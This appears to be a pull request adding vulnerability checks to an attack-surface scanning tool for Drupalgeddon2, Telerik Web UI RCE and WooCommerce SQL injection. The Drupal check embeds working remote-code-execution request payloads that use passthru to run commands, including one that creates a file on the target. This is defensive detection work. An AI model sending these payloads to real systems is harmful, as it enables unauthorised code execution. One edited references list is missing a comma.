### PR TITLE
Additional Checks

### DIFF
--- a/lib/checks/drupal_cve_2018_7600.rb
+++ b/lib/checks/drupal_cve_2018_7600.rb
@@ -1,0 +1,184 @@
+module Intrigue
+  module Issue
+    class DrupalCVE20187600 < BaseIssue
+      def self.generate(instance_details = {})
+        {
+          added: '2021-03-30',
+          name: 'drupal_cve_2018_7600',
+          pretty_name: 'Drupal Unauthenticated Remote Code Execution (Drupalgeddon 2) (CVE-2018-7600)',
+          severity: 1,
+          category: 'vulnerability',
+          status: 'confirmed',
+          description: 'Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.',
+          identifiers: [
+            { type: 'CVE', name: 'CVE-2018-7600' }
+          ],
+          affected_software: [
+            { vendor: 'Drupal', product: 'Drupal' }
+          ],
+          references: [
+            { type: 'description', uri: 'https://nvd.nist.gov/vuln/detail/CVE-2018-7600' },
+            { type: 'description', uri: 'https://drupal.org/sa-core-2018-002'},
+          ],
+          authors: ['jl-dos', 'rootxharsh', 'iamnoooob', 'S1r1u5_', 'cookiehanhoan', 'madrobot', 'maxim']
+        }.merge!(instance_details)
+      end
+    end
+  end
+
+  module Task
+    class DrupalCVE20187600 < BaseCheck
+      def self.check_metadata
+        {
+          allowed_types: ['Uri']
+        }
+      end
+
+      def detect_drupal_version(uri)
+        drupal_7_paths = ['CHANGELOG.txt', 'includes/bootstrap.inc', 'includes/database.inc']
+        drupal_8_paths = ['core/CHANGELOG.txt', 'core/includes/bootstrap.inc', 'core/includes/database.inc']
+
+        responses = drupal_7_paths.map { |p| http_request(:get, "#{uri}/#{p}").code }
+        return 7 unless (responses & ['200', '403']).empty?
+
+        responses = drupal_8_paths.map { |p| http_request(:get, "#{uri}/#{p}").code }
+        return 8 unless (responses & ['200', '403']).empty?
+
+        _log_error 'Drupal Version does not appear to be supported; aborting.'
+      end
+
+      # return truthy value to create an issue
+      def check
+        # run a nuclei
+        uri = _get_entity_name
+        version = detect_drupal_version(uri)
+        return if version.nil?
+
+        drupal_7_template = <<-HEREDOC
+        id: CVE-2018-7600
+
+        info:
+          name: Drupal Drupalgeddon 2 RCE (Drupal 7)
+          author: maxim
+          severity: critical
+          reference: https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
+          tags: cve,cve2018,drupal,rce
+        
+        requests:
+          - raw:
+              - |
+                POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo+-1ntr16u31337 HTTP/1.1
+                Host:  {{Hostname}}
+                User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+                Referer:  {{Hostname}}/user/register
+                Content-Type: application/x-www-form-urlencoded
+                Connection: close
+        
+                form_id=user_pass&_triggering_element_name=name
+        
+              - |
+                POST /?q=file/ajax/name/%23value/{{form_build_id}} HTTP/1.1
+                Host:  {{Hostname}}
+                User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+                Referer:  {{Hostname}}/user/register
+                Content-Type: application/x-www-form-urlencoded
+                Connection: close
+        
+                form_build_id={{form_build_id}}
+        
+            matchers-condition: and
+            matchers:
+              - type: status
+                status:
+                  - 200
+                  
+              - type: word
+                words:
+                  - '1ntr16u31337'
+                part: body
+            extractors:
+              - type: regex
+                name: form_build_id
+                part: body
+                group: 1
+                internal: true
+                regex:
+                  - '<input type="hidden" name="form_build_id" value="(form\-[\w|\-]+)"'
+        HEREDOC
+
+        drupal_8_template = <<-HEREDOC
+        id: CVE-2018-7600
+
+        info:
+          name: Drupal Drupalgeddon 2 RCE (Drupal 8)
+          author: pikpikcu, maxim
+          severity: critical
+          reference: https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600
+          tags: cve,cve2018,drupal,rce
+        
+        requests:
+          - raw:
+              - |
+                POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
+                Host:  {{Hostname}}
+                User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+                Accept: application/json
+                Referer:  {{Hostname}}/user/register
+                X-Requested-With: XMLHttpRequest
+                Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
+                Connection: close
+        
+                -----------------------------99533888113153068481322586663
+                Content-Disposition: form-data; name="mail[#post_render][]"
+        
+                passthru
+                -----------------------------99533888113153068481322586663
+                Content-Disposition: form-data; name="mail[#type]"
+        
+                markup
+                -----------------------------99533888113153068481322586663
+                Content-Disposition: form-data; name="mail[#markup]"
+        
+                echo 1ntr16u31337
+                -----------------------------99533888113153068481322586663
+                Content-Disposition: form-data; name="form_id"
+        
+                user_register_form
+                -----------------------------99533888113153068481322586663
+                Content-Disposition: form-data; name="_drupal_ajax"
+        
+              - |
+                POST /user/register?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
+                Host:  {{Hostname}}
+                User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+                Referer:  {{Hostname}}/user/register
+                Content-Type: application/x-www-form-urlencoded
+                Connection: close
+        
+                form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=passthru&timezone[a][#lazy_builder][][]=touch+/tmp/6
+        
+            matchers-condition: and
+            matchers:
+              - type: word
+                words:
+                  - "1ntr16u31337"
+                  - "The website encountered an unexpected error. Please try again later"
+                part: body
+                condition: or
+        
+              - type: status
+                status:
+                  - 200
+                  - 500
+                condition: or
+        
+        HEREDOC
+
+        _log "Target appears to be running Drupal Version #{version}!"
+        template = version == 8 ? drupal_8_template : drupal_7_template
+        run_nuclei_template_from_string(uri, template)
+
+      end
+    end
+  end
+end

--- a/lib/checks/telerik_cve_2019_18935.rb
+++ b/lib/checks/telerik_cve_2019_18935.rb
@@ -1,0 +1,81 @@
+module Intrigue
+  module Issue
+    class TelerikCVE201918935 < BaseIssue
+      def self.generate(instance_details = {})
+        {
+          added: '2021-03-30',
+          name: 'telerik_cve_2019_18935',
+          pretty_name: 'Telerik Web UI Remote Code Execution (CVE-2019-18935)',
+          severity: 1,
+          category: 'vulnerability',
+          status: 'confirmed',
+          description: 'Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. ',
+          identifiers: [
+            { type: 'CVE', name: 'CVE-2019-18935' }
+          ],
+          affected_software: [
+            { vendor: 'Microsoft', product: 'ASP.NET' }
+          ],
+          references: [
+            { type: 'description', uri: 'https://nvd.nist.gov/vuln/detail/CVE-2019-18935' },
+            { type: 'description', uri: 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization' },
+            { type: 'exploit', uri: 'https://github.com/noperator/CVE-2019-18935' }
+          ],
+          authors: ['Markus Wulftange', 'Paul Taylor', 'maxim']
+        }.merge!(instance_details)
+      end
+    end
+  end
+
+  module Task
+    class TelerikCVE201918935 < BaseCheck
+      def self.check_metadata
+        {
+          allowed_types: ['Uri']
+        }
+      end
+
+
+      def telerik_file_upload_handler_registered?(uri)
+        fp_string = 'RadAsyncUpload handler is registered succesfully, however, it may not be accessed directly'
+        running = http_get_body("#{uri}/Telerik.Web.UI.WebResource.axd?type=rau").include? fp_string
+
+        _log 'Telerik File Upload Handler does not exist on this endpoint; aborting.' unless running
+        running
+      end
+
+      def extract_telerik_version(uri)
+        parsed_uri = URI(uri)
+        r = http_get_body("#{parsed_uri.scheme}://#{parsed_uri.host}") # get index page
+        r.scan(/([\d|\.]+{5,9})/).flatten
+      end
+
+      def check
+        vulnerable_versions = ['2019.3.1023', '2019.3.917', '2019.2.514', '2019.1.215', '2019.1.115', '2018.3.910',
+                               '2018.2.710', '2018.2.516', '2018.1.117', '2015.2.623', '2014.1.403', '2017.3.913',
+                               '2017.2.711', '2017.2.621', '2017.2.503', '2017.1.228', '2017.1.118', '2016.3.1027',
+                               '2016.3.1018', '2016.3.914', '2016.2.607', '2016.2.504', '2016.1.225', '2016.1.113',
+                               '2015.3.1111', '2015.3.930', '2015.2.826', '2015.2.729', '2015.2.604', '2015.1.225',
+                               '2015.1.204', '2014.3.1024', '2014.2.724', '2014.2.618', '2014.1.225', '2013.3.1324',
+                               '2013.3.1114', '2013.3.1015', '2013.2.717', '2013.2.611', '2013.1.417', '2013.1.403',
+                               '2013.1.220', '2012.3.1308', '2012.3.1205', '2012.3.1016', '2012.2.912', '2012.2.724',
+                               '2012.2.607', '2012.1.411', '2012.1.215', '2011.3.1305', '2011.31115', '2011.2915',
+                               '2011.2712', '2011.1519', '2011.1413', '2011.1315', '2010.31317', '2010.31215',
+                               '2010.31109', '2010.2929', '2010.2826', '2010.2713', '2010.1519', '2010.1415',
+                               '2010.1309', '2009.31314', '2009.31208', '2009.31103', '2009.2826', '2009.2701',
+                               '2009.1527', '2009.1402', '2009.1311', '2008.31314', '2008.31125', '2008.31105',
+                               '2008.21001', '2008.2826', '2008.2723', '2008.1619', '2008.1515', '2008.1415',
+                               '2007.31425', '2007.31314', '2007.31218', '2007.21107', '2007.21010', '2007.2918',
+                               '2007.1626', '2007.1521', '2007.1423']
+
+        uri = _get_entity_name
+        return unless telerik_file_upload_handler_registered?(uri)
+
+        is_vulnerable = (extract_telerik_version(uri) & vulnerable_versions).any?
+        _log 'Target is not vulnerable.' unless is_vulnerable
+
+        is_vulnerable
+      end
+    end
+  end
+end

--- a/lib/checks/woocommerce_cve_2021_32790.rb
+++ b/lib/checks/woocommerce_cve_2021_32790.rb
@@ -1,10 +1,10 @@
 module Intrigue
   module Issue
-    class WoocommerceSQLInjection < BaseIssue
+    class WoocommerceCVE202132790 < BaseIssue
       def self.generate(instance_details = {})
         {
           added: '2021-03-30',
-          name: 'woocommerce_sql_injection',
+          name: 'woocommerce_cve_2021_32790',
           pretty_name: 'Woocommerce Unauthenticated SQL Injection (CVE-2021-32790)',
           severity: 1,
           category: 'vulnerability',
@@ -18,11 +18,9 @@ module Intrigue
           ],
           references: [
             { type: 'description', uri: 'https://woocommerce.com/posts/critical-vulnerability-detected-july-2021' },
-            { type: 'description', uri: 'https://nvd.nist.gov/vuln/detail/CVE-2021-32790'}
+            { type: 'description', uri: 'https://nvd.nist.gov/vuln/detail/CVE-2021-32790'},
             { type: 'description', uri: 'https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx' }
           ],
-
-          # rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot
           authors: ['jl-dos', 'rootxharsh', 'iamnoooob', 'S1r1u5_', 'cookiehanhoan', 'madrobot', 'maxim']
         }.merge!(instance_details)
       end
@@ -30,7 +28,7 @@ module Intrigue
   end
 
   module Task
-    class WoocommerceSQLInjection < BaseCheck
+    class WoocommerceCVE202132790 < BaseCheck
       def self.check_metadata
         {
           allowed_types: ['Uri']

--- a/lib/checks/woocommerce_sql_injection.rb
+++ b/lib/checks/woocommerce_sql_injection.rb
@@ -5,19 +5,20 @@ module Intrigue
         {
           added: '2021-03-30',
           name: 'woocommerce_sql_injection',
-          pretty_name: 'Woocommerce Unauthenticated SQL Injection',
+          pretty_name: 'Woocommerce Unauthenticated SQL Injection (CVE-2021-32790)',
           severity: 1,
           category: 'vulnerability',
           status: 'confirmed',
-          description: 'Pending Advisory Notes | WooCommerce (versions 3.3 through 5.5.0) and WooCommerce Blocks feature plugins (versions 2.5 through 5.5.0) were vulnerable to a critical unauthenticated SQL injection vulnerability.',
+          description: 'An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce plugin between version 3.3.0 and 3.3.6. Malicious actors (already) having admin access, or API keys to the WooCommerce site can exploit vulnerable endpoints of `/wp-json/wc/v3/webhooks`, `/wp-json/wc/v2/webhooks` and other webhook listing API. Read-only SQL queries can be executed using this exploit, while data will not be returned, by carefully crafting `search` parameter information can be disclosed using timing and related attacks.',
           identifiers: [
-            { type: 'CVE', name: 'CVE-PENDING' }
+            { type: 'CVE', name: 'CVE-2021-32790' }
           ],
           affected_software: [
             { vendor: 'WooCommerce', product: 'WooCommerce' }
           ],
           references: [
             { type: 'description', uri: 'https://woocommerce.com/posts/critical-vulnerability-detected-july-2021' },
+            { type: 'description', uri: 'https://nvd.nist.gov/vuln/detail/CVE-2021-32790'}
             { type: 'description', uri: 'https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx' }
           ],
 


### PR DESCRIPTION
Hi team,

Please find included in this PR the following:
- Drupalgeddon2 (CVE-2018-7600)
  - This task adds a check for Drupal instances which are vulnerable to Drupalgeddon2. The task supports both Drupal 7 & Drupal 8 (including an additional check for Drupal 8 in case the first one fails). 
- Telerik Web UI RCE (CVE-2019-18935) 
   - As this task involves active exploitation by sending a DLL file which will be uploaded and eventually loaded by the system; it was decided to determine if this was vulnerable by fingerprinting the version. There are two different techniques to determine the version; the first is by extracting it from the response body of the index page. While the second is looking at the `Last Modified Date` response header associated with the Javascript files. However there are scenarios where the version cannot be detected. The check first determines if the File Upload Handler exists and if so proceeds to extract the version.
 - An update for the WooCommerce SQL Injection Check. Additional meta information was added about the task including the CVE number (as it was pending at the time the task was written)

Best regards,
Maxim
